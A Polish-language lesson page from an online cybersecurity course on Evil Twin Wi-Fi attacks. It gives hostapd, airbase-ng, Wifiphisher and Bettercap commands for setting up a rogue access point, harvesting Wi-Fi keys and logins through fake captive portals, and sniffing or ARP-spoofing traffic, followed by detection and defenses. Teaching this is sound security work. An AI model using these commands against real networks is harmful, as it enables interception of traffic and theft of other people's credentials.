Ataki Evil Twin i fałszywe captive portale
Skonfigurują Państwo nieautoryzowany punkt dostępowy do przeprowadzania ataków Evil Twin i wykradania danych uwierzytelniających przez fałszywe captive portale.
Ataki Evil Twin i fałszywe captive portale to bezpłatna lekcja Cyber Security Academy na CoddyKit. To lekcja 3 z 4. Możesz przeczytać całą lekcję poniżej za darmo — a potem ćwiczyć ją interaktywnie w przeglądarce z wbudowanym edytorem kodu i tutorem AI dostępnym 24/7. To część ścieżki edukacyjnej Cyber Security Academy, a Twój postęp synchronizuje się między webem a aplikacją CoddyKit. Kurs Cyber Security Academy zawiera 4 lekcji w sumie.
Atak Evil Twin — omówienie
Evil Twin to nieautoryzowany punkt dostępowy nadający ten sam identyfikator SSID co legalna sieć. Klienci, którzy się z nim łączą, przesyłają cały ruch przez atakującego, co umożliwia wykradanie danych uwierzytelniających, przechwytywanie ruchu i phishing.
Jak klienci wybierają punkty dostępowe
Klienci Wi-Fi łączą się ze znanym identyfikatorem SSID o najsilniejszym sygnale i zgodnych parametrach zabezpieczeń. Nadając z większą mocą albo rozłączając klientów z legalnego punktu dostępowego za pomocą deautentykacji, Evil Twin może przyciągać połączenia.
Tworzenie nieautoryzowanego punktu dostępowego za pomocą Hostapd
Hostapd tworzy programowy punkt dostępowy. W połączeniu z DHCP (dnsmasq) i NAT w iptables zapewnia funkcjonalny punkt dostępowy, który przekierowuje ruch i umożliwia jego przechwytywanie.
# hostapd.conf:
interface=wlan0
driver=nl80211
ssid=TargetNetwork
channel=6
hw_mode=g
# Start AP
hostapd hostapd.conf
# Start DHCP
dnsmasq --interface=wlan0 \
--dhcp-range=192.168.10.100,192.168.10.200,12hKorzystanie z airbase-ng
airbase-ng (część pakietu aircrack-ng) tworzy nieautoryzowane punkty dostępowe bezpośrednio z interfejsu trybu monitorowania — jest to prostsze rozwiązanie w podstawowych konfiguracjach Evil Twin.
# Create open evil twin
airbase-ng -e "TargetNetwork" -c 6 wlan0mon
# Create WPA2 evil twin (same key as legitimate)
airbase-ng -e "TargetNetwork" -z 4 -W 1 -c 6 wlan0monAtak z użyciem portalu captive
Portal captive to strona internetowa, która przechwytuje cały ruch HTTP i wyświetla stronę logowania — często spotyka się ją w hotelach i na lotniskach. Atakujący tworzą nieautoryzowane portale captive, które wykradają dane uwierzytelniające lub hasła do Wi-Fi.
Phishing Wi-Fi z użyciem WiFi-Pumpkin / Wifiphisher
Automatyczne narzędzia tworzą kompletne środowiska Evil Twin z portalami captive zaprojektowanymi tak, aby wyglądały jak legalne strony konfiguracji routera lub logowania u dostawcy usług internetowych.
# Wifiphisher
sudo wifiphisher --essid "TargetNetwork"
# Phishing scenarios:
# - Router firmware upgrade page (harvests Wi-Fi PSK)
# - OAuth login (harvests credentials)
# - Browser plugin update (delivers malware)SSL Stripping
Ataki Evil Twin tradycyjnie opierały się na SSL stripping (sslstrip), aby obniżać poziom zabezpieczeń z HTTPS do HTTP. Współczesne mechanizmy HSTS i wstępne ładowanie HSTS w dużej mierze udaremniły ten atak, ale nieodwiedzane wcześniej witryny lub witryny nieobsługujące HSTS nadal są podatne.
# Historical sslstrip approach:
# iptables REDIRECT port 80
# sslstrip intercepts and downgrades HTTPS to HTTP
# Modern defense: HSTS preload list
# Sites listed are HTTPS-only in browsers
# Cannot be strippedPrzechwytywanie danych uwierzytelniających za pomocą Evil Twin
Za pomocą nieautoryzowanego punktu dostępowego oraz Wireshark lub Bettercap można przechwytywać wszystkie dane uwierzytelniające HTTP przesyłane jawnym tekstem, zapytania DNS ujawniające odwiedzane witryny oraz niezaszyfrowane protokoły aplikacyjne (FTP, SMTP, POP3).
# Bettercap for MitM
bettercap -iface wlan0
# In bettercap console:
net.probe on
net.sniff on
https.proxy on
arp.spoof onObsługa deautentykacji w atakach Evil Twin
Aby zmusić klientów do połączenia z Evil Twin, należy stale wysyłać ramki deautentykacji, które rozłączają ich z legalnym punktem dostępowym. Klienci połączą się ponownie z najsilniejszym sygnałem — czyli z nieautoryzowanym punktem dostępowym.
Wykrywanie ataków Evil Twin
Obrońcy wykrywają ataki Evil Twin za pomocą: WIDS (Wireless Intrusion Detection Systems), które sprawdzają obecność takich samych identyfikatorów SSID przy różnych identyfikatorach BSSID, anomalii sygnału oraz klientów korzystających z opartego na certyfikatach WPA2-Enterprise, odpornego na ataki Evil Twin wykorzystujące PSK.
Zabezpieczenia
Aby zapobiegać atakom Evil Twin, należy używać WPA2/WPA3-Enterprise (EAP-TLS) — nawet połączenie z nieautoryzowanym punktem dostępowym wymaga ważnego certyfikatu; włączyć PMF 802.11w; używać firmowej sieci VPN, która automatycznie łączy się poza zaufanymi sieciami; oraz wdrożyć WIDS do monitorowania punktów dostępowych.
Szybkie sprawdzenie
Dlaczego WPA2-Enterprise z EAP-TLS zapobiega wykradaniu danych uwierzytelniających przez Evil Twin?
Podsumowanie: Evil Twin i portal captive
Ataki Evil Twin wykorzystują fakt, że klienci ufają identyfikatorom SSID zamiast tożsamości kryptograficznej. Nieautoryzowany punkt dostępowy o takiej samej nazwie może przechwytywać ruch, wykradać dane uwierzytelniające za pomocą portali captive oraz przeprowadzać ataki MitM. Obrona wymaga wzajemnego uwierzytelniania (certyfikatów EAP-TLS), firmowych sieci VPN i monitorowania WIDS — nie tylko silnych haseł Wi-Fi.
Często zadawane pytania
Czy lekcja „Ataki Evil Twin i fałszywe captive portale” jest bezpłatna?
Tak — pełny tekst „Ataki Evil Twin i fałszywe captive portale” jest dostępny za darmo tutaj w sieci. Aby ćwiczyć ją interaktywnie (wbudowany edytor kodu i tutor AI dostępny 24/7) i odblokować resztę kursu Cyber Security Academy, przejdź na CoddyKit PRO. Kurs Cyber Security Academy zawiera 4 lekcji w sumie.
Co nauczysz się w „Ataki Evil Twin i fałszywe captive portale”?
Skonfigurują Państwo nieautoryzowany punkt dostępowy do przeprowadzania ataków Evil Twin i wykradania danych uwierzytelniających przez fałszywe captive portale. Ćwiczysz Cyber Security Academy z praktycznym kodem, który uruchamiasz bezpośrednio w przeglądarce, a tutor AI dostępny 24/7 odpowiada na Twoje pytania podczas pracy nad lekcją.
Czy potrzebuję doświadczenia, aby zacząć Cyber Security Academy?
Nie wymagamy żadnego doświadczenia. Cyber Security Academy w CoddyKit jest strukturyzowany dla początkujących i zaawansowanych użytkowników, więc możesz zacząć tutaj lub od początku i uczyć się w swoim tempie. To lekcja 3 z 4.
Ile czasu zajmuje lekcja „Ataki Evil Twin i fałszywe captive portale”?
Większość lekcji CoddyKit trwa około 5–10 minut. Każda lekcja to mały, interaktywny krok, dzięki czemu robisz systematyczne postępy i zawsze wracasz dokładnie do tego samego miejsca — na webie i w aplikacji.
Czy mogę pisać i uruchamiać kod w tej lekcji Cyber Security Academy?
Tak. Każda lekcja Cyber Security Academy zawiera wbudowany edytor kodu, więc piszesz i uruchamiasz prawdziwy kod bezpośrednio w przeglądarce i od razu otrzymujesz sprzężenie zwrotne od AI — bez konfiguracji na komputerze.
Wszystkie lekcje w tym kursie
- Protokoły bezpieczeństwa 802.11: WEP, WPA2 i WPA3
- Przechwytywanie i łamanie uzgadniania WPA2
- Ataki Evil Twin i fałszywe captive portale
- Firmowe sieci Wi-Fi: EAP i RADIUS